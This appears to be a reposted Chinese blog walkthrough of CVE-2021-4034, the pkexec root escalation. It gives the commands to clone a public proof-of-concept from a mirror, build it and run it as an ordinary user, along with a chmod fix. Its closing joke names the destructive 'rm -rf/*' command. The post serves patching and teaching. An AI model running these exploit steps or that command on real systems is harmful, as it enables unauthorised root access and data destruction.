那日,我遥望着星空发呆。幻想着自己中五百万彩票后的事宜。突然一阵急促的消息打破了这本属于我的宁静。原理是阿里云的漏洞提醒!说我有台服务器存在
CVE-2021-4034高危漏洞。这一切太突然了!
关于pkexec
pkexec是一个用于在Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。
漏洞危害
成功利用此漏洞允许任何非root用户在易受攻击的主机上获得root特权。并在默认安装的Ubuntu、Debian、Fedora和CentOS上获得完整的root权限。这个漏洞已经隐藏了12年多,并影响到目前为止所有版本的pkexec。(≤0.120)
漏洞复现
我们为了方便测试,现在Centos中创建一个普通账号。
adduser kali
passwd kali
su kali
查看当前的版本
pkexec --version
复现
git clone https://gitcode.net/mirrors/berdav/CVE-2021-4034.git
make
./cve-2021-4034
效果
修复
取消pkexec程序特权
chmod 0755 /usr/bin/pkexec
总结
身为一名懂得rm -rf/*命令的资深Linux运维者。要时常关注漏洞信息,及时做好应急措施。当然学会如何跑路也是很重要的。
原文始发于微信公众号(kali黑客笔记):CVE-2021-4034漏洞提权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论